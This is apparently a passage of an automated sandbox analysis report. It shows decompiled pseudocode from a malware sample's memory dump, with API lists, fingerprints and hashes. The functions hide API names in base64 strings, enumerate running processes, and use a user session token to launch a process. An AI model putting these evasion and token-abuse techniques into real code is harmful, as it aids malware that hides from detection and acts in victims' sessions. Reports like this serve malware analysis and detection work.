                                                                                                      • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                    • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                    • API String ID: 2206896924-1825016774
                                                                                                    • Opcode ID: 3541d8832b36f0892a1d27c611b6b39943f35115fd077f71142f5b0334879507
                                                                                                    • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
                                                                                                    • Opcode Fuzzy Hash: 3541d8832b36f0892a1d27c611b6b39943f35115fd077f71142f5b0334879507
                                                                                                    • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407DD4 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 48%
                                                                                                    			E00407DD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v96;
				char _v104;
				char _v108;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t27;
				intOrPtr* _t58;
				intOrPtr _t71;
				intOrPtr* _t73;
				void* _t76;
				void* _t78;

				_v108 = 0;
				_v8 = 0;
				_v16 = 0;
				 *[fs:eax] = _t78 + 0xffffff98;
				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v108);
				E00403D2C( &_v16, _v108);
				E00404F00();
				_v104 = 0x44;
				_v96 = 0;
				 *_t25( *[fs:eax], 0x407eea, _t78, __edi, __esi, __ebx, _t76);
				_push( &_v12);
				_push(0);
				if( *_t27() != 0) {
					 *_t73( &_v20, _v12, 0xffffffff);
					_t58 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t58))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}


















                                                                                                    0x00407ddf
                                                                                                    0x00407de2
                                                                                                    0x00407de5
                                                                                                    0x00407df3
                                                                                                    0x00407e06
                                                                                                    0x00407e1d
                                                                                                    0x00407e39
                                                                                                    0x00407e40
                                                                                                    0x00407e4b
                                                                                                    0x00407e58
                                                                                                    0x00407e5d
                                                                                                    0x00407e66
                                                                                                    0x00407e69
                                                                                                    0x00407e70
                                                                                                    0x00407e71
                                                                                                    0x00407e76
                                                                                                    0x00407e82
                                                                                                    0x00407eb3
                                                                                                    0x00407eba
                                                                                                    0x00407ebf
                                                                                                    0x00407ec2
                                                                                                    0x00407ec6
                                                                                                    0x00407ec9
                                                                                                    0x00407ecc
                                                                                                    0x00407ed4
                                                                                                    0x00407edc
                                                                                                    0x00407ee9

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00407E00
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E06
                                                                                                    • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 00407E17
                                                                                                    • GetProcAddress.KERNEL32(00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E1D
                                                                                                    • LoadLibraryA.KERNEL32(userenv.dll), ref: 00407E2E
                                                                                                    • GetProcAddress.KERNEL32(00000000,userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E34
                                                                                                      • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                    • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                    • API String ID: 2206896924-1825016774
                                                                                                    • Opcode ID: 86478b50a7e8737c81cdd02ec66c25257b217c2bcec2324e0f8070e42a551c88
                                                                                                    • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
                                                                                                    • Opcode Fuzzy Hash: 86478b50a7e8737c81cdd02ec66c25257b217c2bcec2324e0f8070e42a551c88
                                                                                                    • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416B94 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E00416B94(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				long _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				CHAR* _t113;
				CHAR* _t119;
				CHAR* _t125;
				void* _t137;
				void* _t141;
				void* _t169;
				signed int _t170;
				void* _t171;
				intOrPtr* _t174;
				signed int _t183;
				intOrPtr* _t192;
				void* _t193;
				signed int _t194;
				signed int _t195;
				intOrPtr _t214;
				intOrPtr _t216;
				signed int _t229;
				intOrPtr* _t239;
				signed int _t240;
				signed int _t242;
				void* _t243;
				void* _t244;
				void* _t246;
				intOrPtr _t247;

				_t238 = __esi;
				_t245 = _t246;
				_t247 = _t246 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = __eax;
				 *[fs:eax] = _t247;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t113 = E00403990(_v588);
				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
				_t119 = E00403990(_v592);
				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
				_t125 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125);
				E004034E4(_v16);
				_t193 =  *_t192(2, 0,  *[fs:eax], 0x416eca, _t246, __edi, __esi, __ebx, _t244);
				if(_t193 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t193);
					if( *_t235() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t183 = E004045EC(_v8);
							_t243 =  &_v584;
							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2);
							_t247 = _t247 + 0x10;
							_t235 = _t243 + 0x116;
							_t239 = _t239;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t193);
						} while ( *_t239() != 0);
					}
					_t174 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t174))(_t193);
				}
				_t137 = E004045EC(_v8) - 1;
				if(_t137 >= 0) {
					_v28 = _t137 + 1;
					_t195 = 0;
					do {
						_v17 = 1;
						_t169 = E004045EC(_v8) - 1;
						if(_t169 >= 0) {
							_t171 = _t169 + 1;
							_t229 = 0;
							do {
								_t43 = _t195 * 0x8b * 4; // 0x0
								_t242 = _t229 * 0x8b;
								_t235 = _v8;
								_t47 = _t242 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t229 = _t229 + 1;
								_t171 = _t171 - 1;
							} while (_t171 != 0);
						}
						_t170 = _t195 * 0x8b;
						_t52 = _t170 * 4; // 0x0
						_t56 = _t170 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1;
						}
						_t195 = _t195 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t141 = E004045EC(_v8) - 1;
				if(_t141 >= 0) {
					_v28 = _t141 + 1;
					_t194 = 0;
					do {
						_t240 = _t194 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) {
							_t75 = _t240 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t240 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t240 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t194 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t194 = _t194 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t216 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t216);
			}









































                                                                                                    0x00416b94
                                                                                                    0x00416b95
                                                                                                    0x00416b97
                                                                                                    0x00416ba2
                                                                                                    0x00416ba8
                                                                                                    0x00416bae
                                                                                                    0x00416bb4
                                                                                                    0x00416bba
                                                                                                    0x00416bc0
                                                                                                    0x00416bc6
                                                                                                    0x00416bcc
                                                                                                    0x00416bcf
                                                                                                    0x00416bd2
                                                                                                    0x00416be0
                                                                                                    0x00416bee
                                                                                                    0x00416bf9
                                                                                                    0x00416c0f
                                                                                                    0x00416c1c
                                                                                                    0x00416c27
                                                                                                    0x00416c3d
                                                                                                    0x00416c4a
                                                                                                    0x00416c55
                                                                                                    0x00416c66
                                                                                                    0x00416c82
                                                                                                    0x00416c87
                                                                                                    0x00416c92
                                                                                                    0x00416c97
                                                                                                    0x00416c9d
                                                                                                    0x00416cad
                                                                                                    0x00416cae
                                                                                                    0x00416cb3
                                                                                                    0x00416cb5
                                                                                                    0x00416cbe
                                                                                                    0x00416ccd
                                                                                                    0x00416cd8
                                                                                                    0x00416cee
                                                                                                    0x00416cf9
                                                                                                    0x00416cf9
                                                                                                    0x00416cf9
                                                                                                    0x00416cfb
                                                                                                    0x00416d0f
                                                                                                    0x00416d1c
                                                                                                    0x00416d1d
                                                                                                    0x00416d20
                                                                                                    0x00416cb5
                                                                                                    0x00416d25
                                                                                                    0x00416d2c
                                                                                                    0x00416d2c
                                                                                                    0x00416d36
                                                                                                    0x00416d39
                                                                                                    0x00416d3c
                                                                                                    0x00416d3f
                                                                                                    0x00416d41
                                                                                                    0x00416d41
                                                                                                    0x00416d4d
                                                                                                    0x00416d50
                                                                                                    0x00416d52
                                                                                                    0x00416d53
                                                                                                    0x00416d55
                                                                                                    0x00416d5e
                                                                                                    0x00416d62
                                                                                                    0x00416d68
                                                                                                    0x00416d6b
                                                                                                    0x00416d6f
                                                                                                    0x00416d71
                                                                                                    0x00416d71
                                                                                                    0x00416d75
                                                                                                    0x00416d76
                                                                                                    0x00416d76
                                                                                                    0x00416d55
                                                                                                    0x00416d79
                                                                                                    0x00416d82
                                                                                                    0x00416d89
                                                                                                    0x00416d8d
                                                                                                    0x00416d8f
                                                                                                    0x00416d8f
                                                                                                    0x00416d97
                                                                                                    0x00416d9c
                                                                                                    0x00416d9c
                                                                                                    0x00416da4
                                                                                                    0x00416da5
                                                                                                    0x00416da5
                                                                                                    0x00416da5
                                                                                                    0x00416d41
                                                                                                    0x00416daf
                                                                                                    0x00416dba
                                                                                                    0x00416dbd
                                                                                                    0x00416dc4
                                                                                                    0x00416dc7
                                                                                                    0x00416dc9
                                                                                                    0x00416dc9
                                                                                                    0x00416dd7
                                                                                                    0x00416de0
                                                                                                    0x00416de7
                                                                                                    0x00416e22
                                                                                                    0x00416e2e
                                                                                                    0x00416e37
                                                                                                    0x00416e3c
                                                                                                    0x00416e42
                                                                                                    0x00416e4f
                                                                                                    0x00416de9
                                                                                                    0x00416de9
                                                                                                    0x00416df5
                                                                                                    0x00416dfe
                                                                                                    0x00416e03
                                                                                                    0x00416e09
                                                                                                    0x00416e0e
                                                                                                    0x00416e1b
                                                                                                    0x00416e1b
                                                                                                    0x00416e5e
                                                                                                    0x00416e6d
                                                                                                    0x00416e7c
                                                                                                    0x00416e7c
                                                                                                    0x00416e87
                                                                                                    0x00416e8c
                                                                                                    0x00416e8d
                                                                                                    0x00416e8d
                                                                                                    0x00416e8d
                                                                                                    0x00416dc9
                                                                                                    0x00416e98
                                                                                                    0x00416e9b
                                                                                                    0x00416e9e
                                                                                                    0x00416eae
                                                                                                    0x00416eb6
                                                                                                    0x00416ebe
                                                                                                    0x00416ec9

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C04
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?), ref: 00416C0A
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C32
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001), ref: 00416C38
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 00416C77
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?), ref: 00416C7D
                                                                                                    • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                    • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                    • API String ID: 3877065590-4127804628
                                                                                                    • Opcode ID: 9a370d218ba479bacba9924df52720c8bc51f1f8e8ad6289ec54fa435578b534
                                                                                                    • Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
                                                                                                    • Opcode Fuzzy Hash: 9a370d218ba479bacba9924df52720c8bc51f1f8e8ad6289ec54fa435578b534
                                                                                                    • Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416B8C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E00416B8C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				signed int _t110;
				CHAR* _t115;
				CHAR* _t121;
				CHAR* _t127;
				void* _t139;
				void* _t143;
				void* _t171;
				signed int _t172;
				void* _t173;
				intOrPtr* _t176;
				signed int _t185;
				intOrPtr* _t194;
				void* _t195;
				signed int _t196;
				signed int _t197;
				intOrPtr _t216;
				intOrPtr _t218;
				signed int _t231;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t244;
				void* _t245;
				void* _t246;
				void* _t248;
				intOrPtr _t249;

				_t240 = __esi;
				_t109 = __eax +  *__eax;
				 *_t109 =  *_t109 + _t109;
				_t110 = _t109 | 0x5500000a;
				_t247 = _t248;
				_t249 = _t248 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t110;
				 *[fs:eax] = _t249;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t115 = E00403990(_v588);
				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
				_t121 = E00403990(_v592);
				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
				_t127 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
				E004034E4(_v16);
				_t195 =  *_t194(2, 0,  *[fs:eax], 0x416eca, _t248, __edi, __esi, __ebx, _t246);
				if(_t195 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t195);
					if( *_t237() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t185 = E004045EC(_v8);
							_t245 =  &_v584;
							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
							_t249 = _t249 + 0x10;
							_t237 = _t245 + 0x116;
							_t241 = _t241;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t195);
						} while ( *_t241() != 0);
					}
					_t176 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t176))(_t195);
				}
				_t139 = E004045EC(_v8) - 1;
				if(_t139 >= 0) {
					_v28 = _t139 + 1;
					_t197 = 0;
					do {
						_v17 = 1;
						_t171 = E004045EC(_v8) - 1;
						if(_t171 >= 0) {
							_t173 = _t171 + 1;
							_t231 = 0;
							do {
								_t43 = _t197 * 0x8b * 4; // 0x0
								_t244 = _t231 * 0x8b;
								_t237 = _v8;
								_t47 = _t244 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t231 = _t231 + 1;
								_t173 = _t173 - 1;
							} while (_t173 != 0);
						}
						_t172 = _t197 * 0x8b;
						_t52 = _t172 * 4; // 0x0
						_t56 = _t172 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
						}
						_t197 = _t197 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t143 = E004045EC(_v8) - 1;
				if(_t143 >= 0) {
					_v28 = _t143 + 1;
					_t196 = 0;
					do {
						_t242 = _t196 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
							_t75 = _t242 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t242 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t242 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t196 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t196 = _t196 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t216);
				 *[fs:eax] = _t216;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t218 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t218);
			}











































                                                                                                    0x00416b8c
                                                                                                    0x00416b8c
                                                                                                    0x00416b8e
                                                                                                    0x00416b90
                                                                                                    0x00416b95
                                                                                                    0x00416b97
                                                                                                    0x00416ba2
                                                                                                    0x00416ba8
                                                                                                    0x00416bae
                                                                                                    0x00416bb4
                                                                                                    0x00416bba
                                                                                                    0x00416bc0
                                                                                                    0x00416bc6
                                                                                                    0x00416bcc
                                                                                                    0x00416bcf
                                                                                                    0x00416bd2
                                                                                                    0x00416be0
                                                                                                    0x00416bee
                                                                                                    0x00416bf9
                                                                                                    0x00416c0f
                                                                                                    0x00416c1c
                                                                                                    0x00416c27
                                                                                                    0x00416c3d
                                                                                                    0x00416c4a
                                                                                                    0x00416c55
                                                                                                    0x00416c66
                                                                                                    0x00416c82
                                                                                                    0x00416c87
                                                                                                    0x00416c92
                                                                                                    0x00416c97
                                                                                                    0x00416c9d
                                                                                                    0x00416cad
                                                                                                    0x00416cae
                                                                                                    0x00416cb3
                                                                                                    0x00416cb5
                                                                                                    0x00416cbe
                                                                                                    0x00416ccd
                                                                                                    0x00416cd8
                                                                                                    0x00416cee
                                                                                                    0x00416cf9
                                                                                                    0x00416cf9
                                                                                                    0x00416cf9
                                                                                                    0x00416cfb
                                                                                                    0x00416d0f
                                                                                                    0x00416d1c
                                                                                                    0x00416d1d
                                                                                                    0x00416d20
                                                                                                    0x00416cb5
                                                                                                    0x00416d25
                                                                                                    0x00416d2c
                                                                                                    0x00416d2c
                                                                                                    0x00416d36
                                                                                                    0x00416d39
                                                                                                    0x00416d3c
                                                                                                    0x00416d3f
                                                                                                    0x00416d41
                                                                                                    0x00416d41
                                                                                                    0x00416d4d
                                                                                                    0x00416d50
                                                                                                    0x00416d52
                                                                                                    0x00416d53
                                                                                                    0x00416d55
                                                                                                    0x00416d5e
                                                                                                    0x00416d62
                                                                                                    0x00416d68
                                                                                                    0x00416d6b
                                                                                                    0x00416d6f
                                                                                                    0x00416d71
                                                                                                    0x00416d71
                                                                                                    0x00416d75
                                                                                                    0x00416d76
                                                                                                    0x00416d76
                                                                                                    0x00416d55
                                                                                                    0x00416d79
                                                                                                    0x00416d82
                                                                                                    0x00416d89
                                                                                                    0x00416d8d
                                                                                                    0x00416d8f
                                                                                                    0x00416d8f
                                                                                                    0x00416d97
                                                                                                    0x00416d9c
                                                                                                    0x00416d9c
                                                                                                    0x00416da4
                                                                                                    0x00416da5
                                                                                                    0x00416da5
                                                                                                    0x00416da5
                                                                                                    0x00416d41
                                                                                                    0x00416daf
                                                                                                    0x00416dba
                                                                                                    0x00416dbd
                                                                                                    0x00416dc4
                                                                                                    0x00416dc7
                                                                                                    0x00416dc9
                                                                                                    0x00416dc9
                                                                                                    0x00416dd7
                                                                                                    0x00416de0
                                                                                                    0x00416de7
                                                                                                    0x00416e22
                                                                                                    0x00416e2e
                                                                                                    0x00416e37
                                                                                                    0x00416e3c
                                                                                                    0x00416e42
                                                                                                    0x00416e4f
                                                                                                    0x00416de9
                                                                                                    0x00416de9
                                                                                                    0x00416df5
                                                                                                    0x00416dfe
                                                                                                    0x00416e03
                                                                                                    0x00416e09
                                                                                                    0x00416e0e
                                                                                                    0x00416e1b
                                                                                                    0x00416e1b
                                                                                                    0x00416e5e
                                                                                                    0x00416e6d
                                                                                                    0x00416e7c
                                                                                                    0x00416e7c
                                                                                                    0x00416e87
                                                                                                    0x00416e8c
                                                                                                    0x00416e8d
                                                                                                    0x00416e8d
                                                                                                    0x00416e8d
                                                                                                    0x00416dc9
                                                                                                    0x00416e98
                                                                                                    0x00416e9b
                                                                                                    0x00416e9e
                                                                                                    0x00416eae
                                                                                                    0x00416eb6
                                                                                                    0x00416ebe
                                                                                                    0x00416ec9

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C04
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?), ref: 00416C0A
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C32
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001), ref: 00416C38
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 00416C77
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?), ref: 00416C7D
                                                                                                    • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                    • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                    • API String ID: 3877065590-4127804628
                                                                                                    • Opcode ID: 65300b4e60da800d415c1a3cb2551db00b88653df35aa2bd350cfea82b7b47e0
                                                                                                    • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
                                                                                                    • Opcode Fuzzy Hash: 65300b4e60da800d415c1a3cb2551db00b88653df35aa2bd350cfea82b7b47e0
                                                                                                    • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416B90 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E00416B90(signed int __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				CHAR* _t114;
				CHAR* _t120;
				CHAR* _t126;
				void* _t138;
				void* _t142;
				void* _t170;
				signed int _t171;
				void* _t172;
				intOrPtr* _t175;
				signed int _t184;
				intOrPtr* _t193;
				void* _t194;
				signed int _t195;
				signed int _t196;
				intOrPtr _t215;
				intOrPtr _t217;
				signed int _t230;
				intOrPtr* _t240;
				signed int _t241;
				signed int _t243;
				void* _t244;
